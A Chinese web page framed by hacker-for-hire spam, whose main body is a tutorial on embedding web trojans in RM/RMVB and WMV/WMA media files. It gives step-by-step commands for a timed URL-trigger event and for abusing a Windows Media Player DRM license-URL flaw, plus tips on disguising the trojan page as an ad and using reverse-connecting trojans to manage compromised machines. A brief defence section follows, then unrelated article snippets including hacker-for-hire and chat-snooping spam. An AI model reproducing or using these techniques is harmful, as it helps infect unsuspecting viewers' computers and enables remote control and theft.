先办事后付款的黑客qq黑客接单 无定金

访客3年前黑客工具556

如今 *** 上流传最为广泛的媒体文件有两类,一类是RM、RMVB文件,另一类是WMV、WMA文件,由于它们对流媒体的良好支持,使 *** 上的电影、音乐等媒体文件几乎都采用了这两种媒体文件格式,因此,如果在媒体文件中植入木马,那么媒体文件中木马独有的隐蔽性将会使受害者在不知不觉中被网页木马侵害,危害性可见一斑。   攻:媒体文件种马于无形   RM、RMVB中加入木马   Helix Producer Plus是一款图形化的专业流媒体文件 *** 工具,我们可以利用Helix Producer Plus这款软件把其他格式的文件转换成RM或RMVB格式,当然也可以对已存在的RM文件进行重新编辑,在编辑的同时,我们可以把事先准备好的网页木马插入其中。这样只要一打开这个编辑好的媒体文件,插入在其中的网页木马也会随之打开,我们甚至还能控制网页木马打开的时间,让网页木马更隐蔽。   步骤1:首先下载Helix Producer Plus,一路“Next”完成安装,然后我们要找一个能把网页木马插入其中的RM电影文件,把它改名为film.rm,然后拷贝到Helix Producer Plus安装目录的RealMediaEditor文件夹下。   步骤2:我们在这个文件夹中新建一个文本文档,命名为test.txt,在test.txt文件中写入这样一句命令:“u 00:07:00 00:07:30 http://www.***.com/index.php”,这句命令的意思是当媒体文件播放到第7分钟后触发打开URL事件,然后到7分30秒的时候事件结束,最后面的就是URL的网址,我们可以把这个网址改成我们的网页木马的地址(关于网页木马的 *** 和设置已经多次介绍,在此不再重复),这样便可以在别人看媒体文件的时候打开网页木马,让他不知不觉中招(如图1)。   小提示:对于 *** 的网页木马应尽量隐蔽,并模仿正常网页,否则在看媒体文件时突然弹出网页谁都会有疑心,当然把它做成类似的广告网页效果更好,别人会以为是广告,便一关了之,而这时我们已经种马成功了。对于木马的选择应尽量使用具有反向连接的木马,如灰鸽子,否则即使有了上百的肉鸡,一个一个去连接也是很麻烦的。   步骤3:运行CMD(命令提示符),进入RealMediaEditor文件夹,输入命令:“rmevents -i film.rm -e test.txt -o film2.rm”,这是最关键的一步,意思是利用Helix Producer Plus自带的rmevents.exe把test.txt这个触发URL事件合并到film.rm中,并另存为film2.rm。这个新生成的film2.rm便是我们需要的带有网页木马的媒体文件(如图2)。 WMV、WMA中加入木马   对于WMA、WMV文件,我们可以利用其默认的播放器Windows Media Player的“Microsoft Windows媒体播放器数字权限管理加载任意网页漏洞”来插入木马。当我们播放已经插入木马的恶意文件时,播放器首先会弹出一个提示窗口,说明此文件经过DRM加密需要通过URL验证证书,而这个URL就是我们事先设置好的网页木马地址,当用户点击“是”进行验证时,我们便种马成功了。和RM文件种马一样,在WMV文件中插入木马我们还需要一样工具——WMDRM打包加密器,这是一款可以对WMA、WMV进行DRM加密的文件,软件本身是为了保护媒体文件的版权,但在攻击者手中,便成了黑客的帮凶。   安装“WMDRM打包加密器”,完成后运行,软件界面很简洁(如图3)。首先出现的是“自定义打包”标签,我们点击“源文件”右边的浏览按钮,选择一个WMA或WMV文件,然后我们在下面的“输出目录”里选择生成恶意文件的保存路径,然后在“输出文件后缀” 中填入生成的文件后缀,建议和源文件保持一致。完成后我们切换到“认证字符串”标签, 在“认证URL”栏里输入我们的网页木马地址,如:http://www.***.com/index.php,其他保持默认即可。再切换到“自定义打包”标签,点击“打包加密’按钮,植有网页木马的恶意媒体文件就生成了。   当用户打开这个恶意媒体文件时,Windows Media Player会要求你获取证书(如图4),点击“确定”后就会弹出我们的网页木马。   有攻就有防,我们不能坐以待毙,任其宰割,其实恶意媒体文件不是我们想象中的那么神秘,只要我们掌握好一些清除网页木马的小知识,就可以完全阻止网页木马运行。 防:恶意媒体,原形毕露   RM、RMVB木马清除 ***   我们以上文中 *** RM木马的 *** 为例,新建一个内容为空的文本文件test.txt,然后在CMD中运行“rmevents -i 存在木马的媒体文件.rm -e test.txt -o film.rm”,这样便可以利用与插入木马相同的办法把触发URL事件覆盖掉,这时输出的film.rm便是不存在木马的干净媒体文件了。   如果对命令提示符的使用不熟悉,我们使用Helix RealMedia Editor来清除其中的网页木马。打开RealMediaEditor文件夹下的rmevents.exe文件,其界面如图5所示,同样新建一个内容为空的test.txt,然后在Helix RealMedia Editor的菜单栏中点击“Tools”,选择其中的“Merge Events”。接着选择我们刚才创建的test.txt,点击“确定”。最后选择“File”菜单中的“Save RealMedia File”保存媒体文件即可,其原理和利用rmevents.exe清除网页木马的原理是一样的。   WMA、WMV木马清除 ***   由于这是利用了Windows Media Player的漏洞,因此我们不能清除媒体文件中的恶意DRM加密信息,我们唯一可以做的就是打好补丁,恶意WMA、WMV文件对打过补丁的Windows Media Player将不起作用。补丁下载地址:http://www.microsoft.com/technet/security/此外,我们还可以选择其他的播放器来播放媒体文件,如暴风影音、Mplayer等,一些在媒体文件中插入网页木马事件的功能在它们面前将不起作用,因此这样也可以在一定程度上防范媒体网页木马。   安全在很大程度上取决于用户的安全意识,只有提高安全意识才能减少中招的概率,比如不打开陌生的媒体文件,不随意进入陌生的网站等,当然光有安全意识还不够,我们还需要杀毒软件等好帮手,毕竟任何网页木马都需要先下载到本地才能运行,而杀毒软件可以防止木马的运行,因此我们必须及时升级杀毒软件的病毒库。只有防先于攻,才能算得上是真正的安全。

相关文章

吊锅菜是什么菜(吊锅菜是哪个地方的菜)

吊锅菜是什么菜(吊锅菜是哪个地方的菜)

吊锅,顾名思义,这是一样和“吊”有关的菜。菜经过炒制,将有铁绊的铁锅套在挂勾上,盖着火苗。那么吊锅是哪里的特色菜?吊锅是什么菜系? 吊锅是一种很有特色的菜品,很适合冬天吃,味道也是非常好的,下面小编...

中餐厅第四季有王俊凯吗 第4季王俊凯是飞行嘉宾吗

中餐厅第四季有王俊凯吗 第4季王俊凯是飞行嘉宾吗

易烊千玺报名参加了两个季节《中餐厅》的视频录制增粉成千上万,大脑聪慧,高情商的他综艺节目实际效果非常好,网爆第4季易烊千玺是特邀嘉宾之一的,但是应当不容易长驻,中餐馆第四季有易烊千玺吗?易烊千玺是飞行...

免费接单黑客QQ是多少?24小时接单的黑客QQ

百度全身心投入地把自己定义为人工智能公司,阿里不断开发布会(医疗大脑、工业大脑、环境大脑),腾讯则宣告自己“AI 即服务”。 两个月前,腾讯声势浩大地拉开了“云+未来”峰会的大幕。当时,腾讯副...

哪个软件可以查微信聊天记录(什么app可以查微信聊天记录)

哪个软件可以查微信聊天记录(什么app可以查微信聊天记录)

本文目录一览: 1、微信怎么找回聊天记录? 2、微信聊天记录在哪里查看? 3、提取别人微信好友聊天记录的软件是什么 4、什么软件可以看到对方微信聊天记录? 微信怎么找回聊天记录? 如果您...

地摊江湖:用产品思维拆解地摊经济

地摊江湖:用产品思维拆解地摊经济

或许每个打工者背后都有一个当老板的空想,国度这就满意你了!克日,地摊经济的高潮囊括全国,公共纷纷惊呼要去摆地摊。本文将教你如何用产物思维让地摊“火”起来,发财致富就此刻。 5月27日,文明办公布:...

毛不易多少岁

  于1994在黑龙江齐齐哈尔出生,身高1.8m;网络综艺节目《嫡之子》冠军   毛不易是嫡之子的最强厂牌,也就是冠军。方才出道3个月,能算几线明星还欠好说,横竖此刻很火,微博上许多几何人在转他的歌,...